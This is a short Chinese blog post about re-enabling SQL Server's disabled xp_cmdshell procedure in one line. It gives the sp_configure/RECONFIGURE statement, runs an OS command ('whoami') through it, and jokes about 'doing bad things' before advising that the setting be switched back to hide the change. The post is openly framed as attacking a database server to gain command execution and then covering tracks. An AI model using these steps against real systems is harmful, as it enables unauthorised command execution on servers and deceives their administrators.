MSSQL2008一句话启用xp_cmdshell
摘要:SQLServer阻止了对组件'xp_cmdshell'的过程'sys.xp_cmdshell'的访问,因为此组件已作为此服务器安全配置的一...
SQL Server 阻止了对组件 'xp_cmdshell' 的 过程 'sys.xp_cmdshell' 的访问,因为此组件已作为此服务器安全配置的一部分而被关闭。系统管理员可以通过使用 sp_configure 启用 'xp_cmdshell'。有关启用 'xp_cmdshell' 的详细信息,请参阅 SQL Server 联机丛书中的 "外围应用配置器"。
幸运的是:只要该扩展存储过程没被删除,我们就可以一句话启用它(不支持多句执行的话,请单独执行每句):
EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;
好了,来试试!
exec master..xp_cmdshell "whoami"
PS:干完坏事要擦PP哦!将开启语句的第二个1改成0再执行,xp_cmdshell就又处于禁用状态了
【MSSQL2008一句话启用xp_cmdshell】相关文章:
★ dedecms v5.1/5.5 两处跨站漏洞的修复办法
下一篇:
微软全系统建立隐藏账户漏洞分析